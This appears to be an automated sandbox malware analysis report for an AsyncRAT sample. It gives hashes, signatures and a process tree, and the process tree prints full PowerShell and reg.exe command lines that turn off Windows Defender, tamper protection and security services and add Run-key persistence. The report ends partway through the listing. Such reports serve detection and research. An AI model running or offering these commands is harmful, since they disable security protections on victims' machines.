Analysis
-
max time kernel
287s -
max time network
294s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 06:54
Behavioral task
behavioral1
Sample
Apsgmjd_Belphegor_obf.exe
Resource
win10v2004-20241007-en
General
-
Target
Apsgmjd_Belphegor_obf.exe
-
Size
188KB
-
MD5
a37ccab1ff586abb6e43113ab8a2b10d
-
SHA1
b9b97fc3bdcf3eb35ad68130a34ecaceef936bac
-
SHA256
46af4880547cfe5d6c873f86f7b172640ddffd445794dcbc213ebb399e38a226
-
SHA512
733115ebe0a453b6aef0e73677525c5f2e3aec1bb1327794db20d2403fdf62fac5ef4ba6d951d03904e877de6475032840eb0b4272a62e8a97d818cbbb2a8aeb
-
SSDEEP
3072:7BhYrfk5BR4ko5ZTFW9bwFaqiUrD7Lz6U+x+:ckl5QNFW9b2aqDnJ+
Malware Config
Signatures
-
Asyncrat family
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/4504-20-0x00000000016A0000-0x0000000001718000-memory.dmp disable_win_def behavioral1/memory/4504-21-0x0000000007620000-0x0000000007698000-memory.dmp disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1" Apsgmjd_Belphegor_obf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "512" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Apsgmjd_Belphegor_obf.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" Apsgmjd_Belphegor_obf.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/4504-2-0x0000000005600000-0x0000000005632000-memory.dmp family_asyncrat -
pid Process 1664 powershell.exe 4188 powershell.exe 6424 powershell.exe 6752 powershell.exe 1160 powershell.exe 3764 powershell.exe 6384 powershell.exe 4448 powershell.exe 2460 powershell.exe 628 powershell.exe 832 powershell.exe 7160 powershell.exe 4632 powershell.exe 3100 powershell.exe 4284 powershell.exe 6328 powershell.exe 3124 powershell.exe 3584 powershell.exe 864 powershell.exe 6672 powershell.exe 116 powershell.exe 5744 powershell.exe 1064 powershell.exe 2628 powershell.exe 1528 powershell.exe 3116 powershell.exe 1632 powershell.exe 4872 powershell.exe 6268 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 6900 netsh.exe -
Possible privilege escalation attempt 3 IoCs
pid Process 6920 takeown.exe 5408 icacls.exe 1332 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Apsgmjd_Belphegor_obf.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 6920 takeown.exe 5408 icacls.exe 1332 icacls.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" Apsgmjd_Belphegor_obf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" Apsgmjd_Belphegor_obf.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GsjJjnxnnax Apsgmjd_Belphegor_obf.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Apsgmjd_Belphegor_obf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Kills process with taskkill 1 IoCs
pid Process 5892 taskkill.exe -
Modifies registry key 1 TTPs 24 IoCs
pid Process 6348 reg.exe 6664 reg.exe 6404 reg.exe 5772 reg.exe 5124 reg.exe 5268 reg.exe 5192 reg.exe 5864 reg.exe 5216 reg.exe 6624 reg.exe 5064 reg.exe 872 reg.exe 5212 reg.exe 5804 reg.exe 3336 reg.exe 5152 reg.exe 5232 reg.exe 1480 reg.exe 740 reg.exe 4864 reg.exe 2872 reg.exe 5724 reg.exe 3512 reg.exe 4444 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe 5596 powershell.exe 5644 powershell.exe 5712 powershell.exe 5584 powershell.exe 5812 powershell.exe 5872 powershell.exe 5596 powershell.exe 5940 powershell.exe 5940 powershell.exe 6068 powershell.exe 6068 powershell.exe 4412 powershell.exe 4412 powershell.exe 6308 powershell.exe 6308 powershell.exe 6512 powershell.exe 6512 powershell.exe 5584 powershell.exe 5584 powershell.exe 5644 powershell.exe 5644 powershell.exe 6692 powershell.exe 6692 powershell.exe 5712 powershell.exe 5712 powershell.exe 556 powershell.exe 556 powershell.exe 536 powershell.exe 536 powershell.exe 5940 powershell.exe 5940 powershell.exe 5812 powershell.exe 5812 powershell.exe 5872 powershell.exe 5872 powershell.exe 3124 powershell.exe 3124 powershell.exe 4448 powershell.exe 4448 powershell.exe 6068 powershell.exe 6068 powershell.exe 6380 powershell.exe 6380 powershell.exe 4412 powershell.exe 4412 powershell.exe 6308 powershell.exe 6308 powershell.exe 6908 powershell.exe 6908 powershell.exe 2980 powershell.exe 2980 powershell.exe 6512 powershell.exe 6512 powershell.exe 3576 powershell.exe 3576 powershell.exe 3492 powershell.exe 3492 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4504 Apsgmjd_Belphegor_obf.exe -
Suspicious use of AdjustPrivilegeToken 61 IoCs
description pid Process Token: SeDebugPrivilege 4504 Apsgmjd_Belphegor_obf.exe Token: SeDebugPrivilege 5596 powershell.exe Token: SeDebugPrivilege 5584 powershell.exe Token: SeDebugPrivilege 5644 powershell.exe Token: SeDebugPrivilege 5712 powershell.exe Token: SeDebugPrivilege 5812 powershell.exe Token: SeDebugPrivilege 5872 powershell.exe Token: SeDebugPrivilege 5940 powershell.exe Token: SeDebugPrivilege 6068 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 6308 powershell.exe Token: SeDebugPrivilege 6512 powershell.exe Token: SeDebugPrivilege 6692 powershell.exe Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 3124 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 6380 powershell.exe Token: SeDebugPrivilege 6908 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 3492 powershell.exe Token: SeDebugPrivilege 3692 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 6544 powershell.exe Token: SeDebugPrivilege 5836 powershell.exe Token: SeDebugPrivilege 6672 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 7128 powershell.exe Token: SeDebugPrivilege 4872 powershell.exe Token: SeDebugPrivilege 116 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 628 powershell.exe Token: SeDebugPrivilege 6424 powershell.exe Token: SeDebugPrivilege 5744 powershell.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 6384 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 6328 powershell.exe Token: SeDebugPrivilege 6752 powershell.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 7160 powershell.exe Token: SeTakeOwnershipPrivilege 6920 takeown.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 5892 taskkill.exe Token: SeDebugPrivilege 6268 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4504 Apsgmjd_Belphegor_obf.exe 4504 Apsgmjd_Belphegor_obf.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4504 Apsgmjd_Belphegor_obf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4504 wrote to memory of 5584 4504 Apsgmjd_Belphegor_obf.exe 92 PID 4504 wrote to memory of 5584 4504 Apsgmjd_Belphegor_obf.exe 92 PID 4504 wrote to memory of 5584 4504 Apsgmjd_Belphegor_obf.exe 92 PID 4504 wrote to memory of 5596 4504 Apsgmjd_Belphegor_obf.exe 94 PID 4504 wrote to memory of 5596 4504 Apsgmjd_Belphegor_obf.exe 94 PID 4504 wrote to memory of 5596 4504 Apsgmjd_Belphegor_obf.exe 94 PID 4504 wrote to memory of 5644 4504 Apsgmjd_Belphegor_obf.exe 96 PID 4504 wrote to memory of 5644 4504 Apsgmjd_Belphegor_obf.exe 96 PID 4504 wrote to memory of 5644 4504 Apsgmjd_Belphegor_obf.exe 96 PID 4504 wrote to memory of 5712 4504 Apsgmjd_Belphegor_obf.exe 98 PID 4504 wrote to memory of 5712 4504 Apsgmjd_Belphegor_obf.exe 98 PID 4504 wrote to memory of 5712 4504 Apsgmjd_Belphegor_obf.exe 98 PID 4504 wrote to memory of 5812 4504 Apsgmjd_Belphegor_obf.exe 100 PID 4504 wrote to memory of 5812 4504 Apsgmjd_Belphegor_obf.exe 100 PID 4504 wrote to memory of 5812 4504 Apsgmjd_Belphegor_obf.exe 100 PID 4504 wrote to memory of 5872 4504 Apsgmjd_Belphegor_obf.exe 102 PID 4504 wrote to memory of 5872 4504 Apsgmjd_Belphegor_obf.exe 102 PID 4504 wrote to memory of 5872 4504 Apsgmjd_Belphegor_obf.exe 102 PID 4504 wrote to memory of 5940 4504 Apsgmjd_Belphegor_obf.exe 104 PID 4504 wrote to memory of 5940 4504 Apsgmjd_Belphegor_obf.exe 104 PID 4504 wrote to memory of 5940 4504 Apsgmjd_Belphegor_obf.exe 104 PID 4504 wrote to memory of 6068 4504 Apsgmjd_Belphegor_obf.exe 106 PID 4504 wrote to memory of 6068 4504 Apsgmjd_Belphegor_obf.exe 106 PID 4504 wrote to memory of 6068 4504 Apsgmjd_Belphegor_obf.exe 106 PID 4504 wrote to memory of 4412 4504 Apsgmjd_Belphegor_obf.exe 108 PID 4504 wrote to memory of 4412 4504 Apsgmjd_Belphegor_obf.exe 108 PID 4504 wrote to memory of 4412 4504 Apsgmjd_Belphegor_obf.exe 108 PID 4504 wrote to memory of 6308 4504 Apsgmjd_Belphegor_obf.exe 110 PID 4504 wrote to memory of 6308 4504 Apsgmjd_Belphegor_obf.exe 110 PID 4504 wrote to memory of 6308 4504 Apsgmjd_Belphegor_obf.exe 110 PID 4504 wrote to memory of 6512 4504 Apsgmjd_Belphegor_obf.exe 218 PID 4504 wrote to memory of 6512 4504 Apsgmjd_Belphegor_obf.exe 218 PID 4504 wrote to memory of 6512 4504 Apsgmjd_Belphegor_obf.exe 218 PID 4504 wrote to memory of 6692 4504 Apsgmjd_Belphegor_obf.exe 114 PID 4504 wrote to memory of 6692 4504 Apsgmjd_Belphegor_obf.exe 114 PID 4504 wrote to memory of 6692 4504 Apsgmjd_Belphegor_obf.exe 114 PID 4504 wrote to memory of 556 4504 Apsgmjd_Belphegor_obf.exe 116 PID 4504 wrote to memory of 556 4504 Apsgmjd_Belphegor_obf.exe 116 PID 4504 wrote to memory of 556 4504 Apsgmjd_Belphegor_obf.exe 116 PID 4504 wrote to memory of 536 4504 Apsgmjd_Belphegor_obf.exe 118 PID 4504 wrote to memory of 536 4504 Apsgmjd_Belphegor_obf.exe 118 PID 4504 wrote to memory of 536 4504 Apsgmjd_Belphegor_obf.exe 118 PID 4504 wrote to memory of 3124 4504 Apsgmjd_Belphegor_obf.exe 120 PID 4504 wrote to memory of 3124 4504 Apsgmjd_Belphegor_obf.exe 120 PID 4504 wrote to memory of 3124 4504 Apsgmjd_Belphegor_obf.exe 120 PID 4504 wrote to memory of 4448 4504 Apsgmjd_Belphegor_obf.exe 122 PID 4504 wrote to memory of 4448 4504 Apsgmjd_Belphegor_obf.exe 122 PID 4504 wrote to memory of 4448 4504 Apsgmjd_Belphegor_obf.exe 122 PID 4504 wrote to memory of 6380 4504 Apsgmjd_Belphegor_obf.exe 124 PID 4504 wrote to memory of 6380 4504 Apsgmjd_Belphegor_obf.exe 124 PID 4504 wrote to memory of 6380 4504 Apsgmjd_Belphegor_obf.exe 124 PID 4504 wrote to memory of 6908 4504 Apsgmjd_Belphegor_obf.exe 126 PID 4504 wrote to memory of 6908 4504 Apsgmjd_Belphegor_obf.exe 126 PID 4504 wrote to memory of 6908 4504 Apsgmjd_Belphegor_obf.exe 126 PID 4504 wrote to memory of 2980 4504 Apsgmjd_Belphegor_obf.exe 128 PID 4504 wrote to memory of 2980 4504 Apsgmjd_Belphegor_obf.exe 128 PID 4504 wrote to memory of 2980 4504 Apsgmjd_Belphegor_obf.exe 128 PID 4504 wrote to memory of 828 4504 Apsgmjd_Belphegor_obf.exe 130 PID 4504 wrote to memory of 828 4504 Apsgmjd_Belphegor_obf.exe 130 PID 4504 wrote to memory of 828 4504 Apsgmjd_Belphegor_obf.exe 130 PID 5596 wrote to memory of 4864 5596 powershell.exe 132 PID 5596 wrote to memory of 4864 5596 powershell.exe 132 PID 5596 wrote to memory of 4864 5596 powershell.exe 132 PID 4504 wrote to memory of 3576 4504 Apsgmjd_Belphegor_obf.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\Apsgmjd_Belphegor_obf.exe"C:\Users\Admin\AppData\Local\Temp\Apsgmjd_Belphegor_obf.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5584 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5064
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5596 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" delete HKLM\Software\Policies\Microsoft\Windows Defender /f3⤵
- Modifies registry key
PID:4864
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5644 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2872
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5712 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiVirus /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:872
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5812 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine /v MpEnablePus / t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:5192
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5872 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5268
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
